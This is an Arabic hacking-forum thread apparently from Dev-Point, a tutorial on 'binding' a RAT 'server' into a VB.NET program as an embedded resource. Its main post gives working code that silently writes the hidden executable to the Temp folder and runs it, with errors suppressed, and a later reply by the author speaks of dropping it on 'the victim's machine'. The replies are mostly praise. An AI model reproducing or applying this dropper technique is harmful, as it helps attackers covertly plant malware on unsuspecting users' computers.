[ VB.NET ] طريقة التلغيم الصحيحة بالفيجوال بيزك دوت نت ...

تم تحميل الصفحة في 0,9461231 ثانية
طريقة التلغيم الصحيحة بالفيجوال بيزك دوت نت ...
إنضم
10 مارس 2011
المشاركات
1,945
الإعجابات
723
النقاط
0



موضوع اليوم بآين من الموضوع
طريقة التلغيم الصحيح بالفيجوال بيزك دوت نت



نفتح المشروع الـ هنلغمة
ثم




تفتح الخصائص
Properties
وبعدين
نجي على الـ Resources
ونضغط على الزر الـ هو بجوار كلمة Strings
هتنزل لك قآئمة
إختار منها Other


تم تصغير حجم الصورة تلقائياً لسهولة التصفّح , اضغط هنا لمشاهدتها بالحجم الطبيعي 800x450.


وبعدين اختار
Add Resources

هتنزل لك قآئمة إختار منها
Add Existing File


تم تصغير حجم الصورة تلقائياً لسهولة التصفّح , اضغط هنا لمشاهدتها بالحجم الطبيعي 800x450.


هيفتح لك الفورم الـ بتختار منها الملف الخارجى
اختار السيرفر الـ إنت عاوزو
انا مثلا إخترت ملف إسمه
tool
وحاول تسمي الملف بتاعك او السيرفر او البرنامج او ايان كان
حروف إنجلش ميكونش فيها مسافات ميكونتش فيها عربي
عشان نتجنب اى اخطآء

هيجيلك الملف الـ إنت اخترته بالشكل دا



كدا خلصنا هنا
تعالا بقا وإفتح الفورم بتاعتك
وافتح مكان الكود

الكود الـ انا عملتهولك دا
هينزلك الملف بتاعك في فولدر الـ Temp

وهيشغلو


تم تصغير حجم الصورة تلقائياً لسهولة التصفّح , اضغط هنا لمشاهدتها بالحجم الطبيعي 791x189.



On Error Resume Next
Dim Dir As String = My.Computer.FileSystem.SpecialDirectories.Temp
Dim Filename As String = Dir + "Tool.exe"
IO.File.WriteAllBytes(Filename, My.Resources.Tool)
Process.Start(Filename)




Dim Dir As String = My.Computer.FileSystem.SpecialDirectories.Temp




تقوم بتعريف الإسترنج Dir

بمكان فولدر (مجلد) الـ Temp
ولو محدش يعرف يعنى Temp
دا فولدر موجود في اى جهاز بالنسبة للوندوس موجود في ملفات الوندوس
وهو الفولدر الوحيد الـ تقدر تنقل جواه ملفات وتحمل من على النت جواه اى ملفات
من غير اى ادمنستراتور

ممكن تغير مكان الـ فولدر بتاعك مثلا
تكتب



Dim Dir as string = "C:\"


كدا يبقى إنت عرفت إسم Dir دا بمكان الـ سي


------------------


Dim Filename As String = Dir + "Tool.exe"



هنا بنعرف الإسترنج الـ إسمه
Filename
وبنكتب فيه اسم السيرفر بتاعك بإمتداده
زى مانت رفعته فى المشروع
هتلاقيه موجود فى الـ
Solution explorer
فى مجلد إسمه
Resources
موجود فيها الاداه الـ إنت ضفتها لبرنامجك


يبقى كدا من الكود الاولانى
والكود دا
وصلنا إن الإستنرج الـ إسمه
Filename

هيكون تحديد مسار الملف (إنت عاوز الملف ينزل في الجهاز فين ؟؟)
انا عاوزة ينزل في مجلد التيمب Temp

يبقى هيكون دا مسار الملف في النهاية ..
مسار الـ تيمب + إسم السيرفر


----------


IO.File.WriteAllBytes(Filename, My.Resources.Tool)



دا الكود الـ بينفذ العملية
بينسخ الملف بتاعك من الريسورس
للمسار الـ إنت عاوزو

المسار هو Filename
والسيرفر بتاعك في الريسورس الـ هو
My.Resources.Tool

---------------


Process.Start(Filename)




هو دا بقا الكود الـ هيشغل لك السيرفر او الملف او الصورة


واى مشكلة او إستفسآر انا موجود إن شآء ألله



جميع ألحقوق محفوطة
.ılı.ĵưŠŧ●Ƀέ●мя●мăƬяěx.ılı.
إلى منتدى ألـ ديف بوينت
Dev-Point




إهــدآآءإلـي
كـل مبدع رآيتة فـ عـ‘ـآلم ألديف ألـ عظيم
ألمحبوب إلـ قلبي كثيرآ

.....

إهـدآء ـخـآص إليـﮯ

Glaidator
Hak Master
Dr.AdeeB
AntiVirus7
ÊĽŵĂĽĕĚĎ
Mr.MG
Roka
Šênĭôř ŠaŠa
CAT MAN
ĘŞŁДΜ
Dr.MOT
Hakar avsan
Al-3aNeeeeeD
Mr.Saqer
simon-benyo
px2

ã7ŚДš ŴДҒĀ
آلوضع يحتاج ركود

ThE.GhOsT!
أأبو حمــآآمة

Rafah
المشاغب المغربي
X-pro
ValY
Jaheem hacker
Asmar-ri
Its Soul
Mr-GhoSt

الْمُهَاجِرِ الْفِلِسْطِيْنِيِّ
هــــآوٍي
ὧ مُركيز المُطيريـﮯ ὧ

x2ip
M J R m Dz
SN!P£R Pa$$WoRD
®..яoќa..®
SOKON
وآعتـﺫر إﺫآ غفوت ونـسيـت أحدآً



إدآ رأيتم أنى أستحق ألـ تقييم

قيمونى و إدا مـآ أمكن
تكفينى دعوة صـآلحة
كـآن معكم
محبكم وأخـيكم

lı.мямăƬяěxlı


 
إنضم
11 يناير 2012
المشاركات
7,483
الإعجابات
8,340
النقاط
113
الإقامة
04
رد: طريقة التلغيم الصحيحة بالفيجوال بيزك دوت نت ...


لله عليك يا أحمد شرح ولا أروع :36:
لديك طريقة في شرح رائعة :6:
مع أن صور لم تضهر لي ولاكن فهمت درسك
:45:
وشكرااا لك للإهداء
:19:

+

+
:45:
+
:27:

 
إنضم
25 أكتوبر 2012
المشاركات
291
الإعجابات
239
النقاط
0
العمر
25
الإقامة
IraQ
رد: طريقة التلغيم الصحيحة بالفيجوال بيزك دوت نت ...

الله عليك يا اخي كم انت رائع . لكن ممكن ترفع الصور :24: وشكرا لك اخي العزيز :8:
 
إنضم
28 يوليو 2011
المشاركات
2,541
الإعجابات
1,597
النقاط
113
الإقامة
Egypt
رد: طريقة التلغيم الصحيحة بالفيجوال بيزك دوت نت ...

عليكم ألسللأأم ورحمهـ ألله وبركأته ؛
مأشاء ألله على ألشروٌحات وألمواأضيع ألحصريُه أليوُم ,
جننتٌنى بأبدأعاتك يأاحمد بيه خُـف علينأ يأرأأجل مش كده
تسلُم أيدك ورجلك يأأأحأأج دمت سألم بأذن ألله
؛

 
إنضم
10 مارس 2011
المشاركات
1,945
الإعجابات
723
النقاط
0
رد: طريقة التلغيم الصحيحة بالفيجوال بيزك دوت نت ...

الله عليك يا اخي كم انت رائع . لكن ممكن ترفع الصور :24: وشكرا لك اخي العزيز :8:

منور الموضوع يآ غآلى ..
عيونى لك برفعلك الـ صور ..
َ:32:

 
إنضم
10 مارس 2011
المشاركات
1,945
الإعجابات
723
النقاط
0
رد: طريقة التلغيم الصحيحة بالفيجوال بيزك دوت نت ...


لله عليك يا أحمد شرح ولا أروع :36:
لديك طريقة في شرح رائعة :6:
مع أن صور لم تضهر لي ولاكن فهمت درسك
:45:
وشكرااا لك للإهداء
:19:

+

+
:45:
+
:27:


كيف الصور مآ ظهرت :3:
مرفوعة على الـ imageshack

منور الموضوع حبيبي
ورح أرفع الصور الحـين ..

:32:

 
إنضم
10 مارس 2011
المشاركات
1,945
الإعجابات
723
النقاط
0
رد: طريقة التلغيم الصحيحة بالفيجوال بيزك دوت نت ...

عليكم ألسللأأم ورحمهـ ألله وبركأته ؛
مأشاء ألله على ألشروٌحات وألمواأضيع ألحصريُه أليوُم ,
جننتٌنى بأبدأعاتك يأاحمد بيه خُـف علينأ يأرأأجل مش كده
تسلُم أيدك ورجلك يأأأحأأج دمت سألم بأذن ألله
؛

حبيبي واخوي الغآلى
منور الموضوع يآ غآلى
تسلم على مروركـ الـطيب ..
:32:

أحلى وردة

 
إنضم
26 أكتوبر 2012
المشاركات
265
الإعجابات
151
النقاط
0
رد: طريقة التلغيم الصحيحة بالفيجوال بيزك دوت نت ...

طيب لو انا مش عايز انزل حاجه على الجهاز يعنى اشغل السيرفر من الريسورس مباشره

فيه كود لكده ؟.
 
إنضم
10 مارس 2011
المشاركات
1,945
الإعجابات
723
النقاط
0
رد: طريقة التلغيم الصحيحة بالفيجوال بيزك دوت نت ...

طيب لو انا مش عايز انزل حاجه على الجهاز يعنى اشغل السيرفر من الريسورس مباشره

فيه كود لكده ؟.
مينفعش حاجة تشتغل من الريسورس ع طول
لازم تنزل الاول فى جهاز الضحية
وبعدين تشتغل

(دا على حد علمي وتجاربي)

وبالتوفيق
 
إنضم
15 مايو 2012
المشاركات
1,690
الإعجابات
1,004
النقاط
113
العمر
22
الإقامة
تــــــــــــــــــــونس
رد: طريقة التلغيم الصحيحة بالفيجوال بيزك دوت نت ...

يُـ‘ـُعُـ‘ـُطُـ‘ـُيُـ‘ـُكُـ‘ـُ آلُـ‘ـُعُـ‘ـُآفُـ‘ـُيُـ‘ـُة حُـ‘ـُبُـ‘ـُيُـ‘ـُبُـ‘ـُـــــــــــــيُـ‘ـُ :32:
 
إنضم
10 مارس 2011
المشاركات
1,945
الإعجابات
723
النقاط
0
رد: طريقة التلغيم الصحيحة بالفيجوال بيزك دوت نت ...

يُـ‘ـُعُـ‘ـُطُـ‘ـُيُـ‘ـُكُـ‘ـُ آلُـ‘ـُعُـ‘ـُآفُـ‘ـُيُـ‘ـُة حُـ‘ـُبُـ‘ـُيُـ‘ـُبُـ‘ـُـــــــــــــيُـ‘ـُ :32:
تسلم أخى الغآلى .. منور الموضوع
:32:
 

الأعضاء النشطين حاليآ الذين يشاهدون هذا الموضوع (1 عضو و 0 ضيف)

خيارات الاستايل

نوع الخط
مودك
اخفاء السايدر بار OFF
توسيط المنتدى OFF
فصل الأقسام OFF
الأقسام الفرعية OFF
عرض المشاركات
حجم الخط
معلومات العضو OFF
إخفاء التوقيع OFF

إرجاع خيارات الإستايل